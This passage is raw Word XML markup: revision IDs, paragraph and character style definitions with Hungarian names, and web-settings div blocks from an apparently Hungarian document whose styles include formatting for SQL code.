    <w:rsid w:val="00FB406E"/>
    <w:rsid w:val="00FB41F1"/>
    <w:rsid w:val="00FB54CF"/>
    <w:rsid w:val="00FB5801"/>
    <w:rsid w:val="00FB6BE6"/>
    <w:rsid w:val="00FB6FA9"/>
    <w:rsid w:val="00FB756E"/>
    <w:rsid w:val="00FB78EB"/>
    <w:rsid w:val="00FC152C"/>
    <w:rsid w:val="00FC245F"/>
    <w:rsid w:val="00FC2B6C"/>
    <w:rsid w:val="00FC3688"/>
    <w:rsid w:val="00FC3DE6"/>
    <w:rsid w:val="00FC3EED"/>
    <w:rsid w:val="00FC40BE"/>
    <w:rsid w:val="00FC4338"/>
    <w:rsid w:val="00FC4B6A"/>
    <w:rsid w:val="00FC628F"/>
    <w:rsid w:val="00FC64FC"/>
    <w:rsid w:val="00FC72D1"/>
    <w:rsid w:val="00FC7DFF"/>
    <w:rsid w:val="00FD1B1B"/>
    <w:rsid w:val="00FD3899"/>
    <w:rsid w:val="00FD4257"/>
    <w:rsid w:val="00FD4A38"/>
    <w:rsid w:val="00FD6296"/>
    <w:rsid w:val="00FD7A4B"/>
    <w:rsid w:val="00FE16ED"/>
    <w:rsid w:val="00FE1B03"/>
    <w:rsid w:val="00FE2091"/>
    <w:rsid w:val="00FE2D57"/>
    <w:rsid w:val="00FE3B68"/>
    <w:rsid w:val="00FE3C59"/>
    <w:rsid w:val="00FE4017"/>
    <w:rsid w:val="00FE4306"/>
    <w:rsid w:val="00FE44F7"/>
    <w:rsid w:val="00FE498D"/>
    <w:rsid w:val="00FE78F7"/>
    <w:rsid w:val="00FE7DC1"/>
    <w:rsid w:val="00FF0472"/>
    <w:rsid w:val="00FF14DE"/>
    <w:rsid w:val="00FF382E"/>
    <w:rsid w:val="00FF481C"/>
    <w:rsid w:val="00FF48AE"/>
    <w:rsid w:val="00FF4F25"/>
    <w:rsid w:val="00FF4F8A"/>
    <w:rsid w:val="00FF5C5B"/>
    <w:rsid w:val="00FF62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7170"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{355BAB73-C1C0-40FF-8C1A-FDAA151B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20DF3"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Cmsor1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Norml"/>
    <w:next w:val="Norml"/>
    <w:link w:val="Cmsor1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00B55F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qFormat/>
    <w:rsid w:val="00B32904"/>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unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="007E7132"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>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20DF3"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4536"/>
        <w:tab w:val="right" w:pos="9072"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="lfejChar">
    <w:name w:val="Élőfej Char"/>
    <w:basedOn w:val="Bekezdsalapbettpusa"/>
    <w:link w:val="lfej"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00520DF3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="llb">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Norml"/>
    <w:link w:val="llbChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00520DF3"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4536"/>
        <w:tab w:val="right" w:pos="9072"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="llbChar">
    <w:name w:val="Élőláb Char"/>
    <w:basedOn w:val="Bekezdsalapbettpusa"/>
    <w:link w:val="llb"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00520DF3"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="dek1">
    <w:name w:val="dek1"/>
    <w:basedOn w:val="Norml"/>
    <w:rsid w:val="00520DF3"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="36"/>
      <w:lang w:val="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="dek2">
    <w:name w:val="dek2"/>
    <w:basedOn w:val="Norml"/>
    <w:rsid w:val="00520DF3"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="dek3">
    <w:name w:val="dek3"/>
    <w:basedOn w:val="Norml"/>
    <w:rsid w:val="00520DF3"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="dek4">
    <w:name w:val="dek4"/>
    <w:basedOn w:val="Norml"/>
    <w:rsid w:val="00520DF3"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="dco1">
    <w:name w:val="dco1"/>
    <w:basedOn w:val="Norml"/>
    <w:rsid w:val="00520DF3"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="dco2">
    <w:name w:val="dco2"/>
    <w:basedOn w:val="Norml"/>
    <w:rsid w:val="00520DF3"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="dco3">
    <w:name w:val="dco3"/>
    <w:basedOn w:val="Norml"/>
    <w:link w:val="dco3Char"/>
    <w:rsid w:val="00520DF3"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="dco4">
    <w:name w:val="dco4"/>
    <w:basedOn w:val="Norml"/>
    <w:rsid w:val="00520DF3"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="dco6">
    <w:name w:val="dco6"/>
    <w:basedOn w:val="dek4"/>
    <w:rsid w:val="00520DF3"/>
    <w:rPr>
      <w:b w:val="0"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="dco5">
    <w:name w:val="dco5"/>
    <w:basedOn w:val="Norml"/>
    <w:rsid w:val="00520DF3"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="dco3Char">
    <w:name w:val="dco3 Char"/>
    <w:link w:val="dco3"/>
    <w:rsid w:val="00520DF3"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Cmsor2Char">
    <w:name w:val="Címsor 2 Char"/>
    <w:basedOn w:val="Bekezdsalapbettpusa"/>
    <w:link w:val="Cmsor2"/>
    <w:rsid w:val="00B32904"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="en-US" w:eastAsia="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="dfk2">
    <w:name w:val="dfk2"/>
    <w:basedOn w:val="Norml"/>
    <w:link w:val="dfk2Char"/>
    <w:rsid w:val="00B32904"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="709"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="dfk2Char">
    <w:name w:val="dfk2 Char"/>
    <w:link w:val="dfk2"/>
    <w:rsid w:val="00B32904"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="dto2">
    <w:name w:val="dto2"/>
    <w:basedOn w:val="Norml"/>
    <w:link w:val="dto2Char"/>
    <w:rsid w:val="00B55F7D"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="dto3">
    <w:name w:val="dto3"/>
    <w:basedOn w:val="Norml"/>
    <w:rsid w:val="00B55F7D"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="dtj2">
    <w:name w:val="dtj2"/>
    <w:basedOn w:val="Norml"/>
    <w:link w:val="dtj2Char"/>
    <w:rsid w:val="00B55F7D"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="dto2Char">
    <w:name w:val="dto2 Char"/>
    <w:link w:val="dto2"/>
    <w:rsid w:val="00B55F7D"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:i/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="dtj2Char">
    <w:name w:val="dtj2 Char"/>
    <w:link w:val="dtj2"/>
    <w:rsid w:val="00B55F7D"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="en-US" w:eastAsia="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Cmsor1Char">
    <w:name w:val="Címsor 1 Char"/>
    <w:basedOn w:val="Bekezdsalapbettpusa"/>
    <w:link w:val="Cmsor1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00B55F7D"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US" w:eastAsia="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Tartalomjegyzkcmsora">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Cmsor1"/>
    <w:next w:val="Norml"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B55F7D"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TJ2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Norml"/>
    <w:next w:val="Norml"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B55F7D"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="240"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hiperhivatkozs">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Bekezdsalapbettpusa"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B55F7D"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormlWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Norml"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008F7A2C"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Jegyzethivatkozs">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="Bekezdsalapbettpusa"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DE64B9"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Jegyzetszveg">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Norml"/>
    <w:link w:val="JegyzetszvegChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DE64B9"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="JegyzetszvegChar">
    <w:name w:val="Jegyzetszöveg Char"/>
    <w:basedOn w:val="Bekezdsalapbettpusa"/>
    <w:link w:val="Jegyzetszveg"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00DE64B9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Megjegyzstrgya">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="Jegyzetszveg"/>
    <w:next w:val="Jegyzetszveg"/>
    <w:link w:val="MegjegyzstrgyaChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DE64B9"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="MegjegyzstrgyaChar">
    <w:name w:val="Megjegyzés tárgya Char"/>
    <w:basedOn w:val="JegyzetszvegChar"/>
    <w:link w:val="Megjegyzstrgya"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00DE64B9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Listaszerbekezds">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Norml"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00E31BF0"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Cmsor3Char">
    <w:name w:val="Címsor 3 Char"/>
    <w:basedOn w:val="Bekezdsalapbettpusa"/>
    <w:link w:val="Cmsor3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="007E7132"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Stlus1">
    <w:name w:val="Stílus1"/>
    <w:basedOn w:val="Cmsor2"/>
    <w:link w:val="Stlus1Char"/>
    <w:qFormat/>
    <w:rsid w:val="007E7132"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:lang w:val="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Stlus2">
    <w:name w:val="Stílus2"/>
    <w:basedOn w:val="Cmsor3"/>
    <w:link w:val="Stlus2Char"/>
    <w:qFormat/>
    <w:rsid w:val="007E7132"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:ind w:left="284" w:hanging="284"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
      <w:sz w:val="26"/>
      <w:lang w:val="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Stlus1Char">
    <w:name w:val="Stílus1 Char"/>
    <w:basedOn w:val="Cmsor2Char"/>
    <w:link w:val="Stlus1"/>
    <w:rsid w:val="007E7132"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="en-US" w:eastAsia="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Stlus3">
    <w:name w:val="Stílus3"/>
    <w:basedOn w:val="Stlus2"/>
    <w:link w:val="Stlus3Char"/>
    <w:qFormat/>
    <w:rsid w:val="007E7132"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="19"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Stlus2Char">
    <w:name w:val="Stílus2 Char"/>
    <w:basedOn w:val="Cmsor3Char"/>
    <w:link w:val="Stlus2"/>
    <w:rsid w:val="007E7132"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TJ3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Norml"/>
    <w:next w:val="Norml"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007E7132"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Stlus3Char">
    <w:name w:val="Stílus3 Char"/>
    <w:basedOn w:val="Stlus2Char"/>
    <w:link w:val="Stlus3"/>
    <w:rsid w:val="007E7132"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML-kd">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="Bekezdsalapbettpusa"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002D1B0D"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sqlkeywordcolor">
    <w:name w:val="sqlkeywordcolor"/>
    <w:basedOn w:val="Bekezdsalapbettpusa"/>
    <w:rsid w:val="00EA7C60"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sqlnumbercolor">
    <w:name w:val="sqlnumbercolor"/>
    <w:basedOn w:val="Bekezdsalapbettpusa"/>
    <w:rsid w:val="00EA7C60"/>
  </w:style>
  <w:style w:type="character" w:styleId="Feloldatlanmegemlts">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Bekezdsalapbettpusa"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00447EB6"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Lbjegyzetszveg">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Norml"/>
    <w:link w:val="LbjegyzetszvegChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D7139A"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="LbjegyzetszvegChar">
    <w:name w:val="Lábjegyzetszöveg Char"/>
    <w:basedOn w:val="Bekezdsalapbettpusa"/>
    <w:link w:val="Lbjegyzetszveg"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00D7139A"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Lbjegyzet-hivatkozs">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="Bekezdsalapbettpusa"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D7139A"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Sorszma">
    <w:name w:val="line number"/>
    <w:basedOn w:val="Bekezdsalapbettpusa"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003A3649"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Kpalrs">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Norml"/>
    <w:next w:val="Norml"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00425034"/>
    <w:pPr>
      <w:spacing w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Rcsostblzat">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="Normltblzat"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00CF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F16446"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Vgjegyzetszvege">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="Norml"/>
    <w:link w:val="VgjegyzetszvegeChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00392E6B"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="VgjegyzetszvegeChar">
    <w:name w:val="Végjegyzet szövege Char"/>
    <w:basedOn w:val="Bekezdsalapbettpusa"/>
    <w:link w:val="Vgjegyzetszvege"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00392E6B"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Vgjegyzet-hivatkozs">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="Bekezdsalapbettpusa"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00392E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400">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1195925534">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="945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1051">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="580602052">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="656881639">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
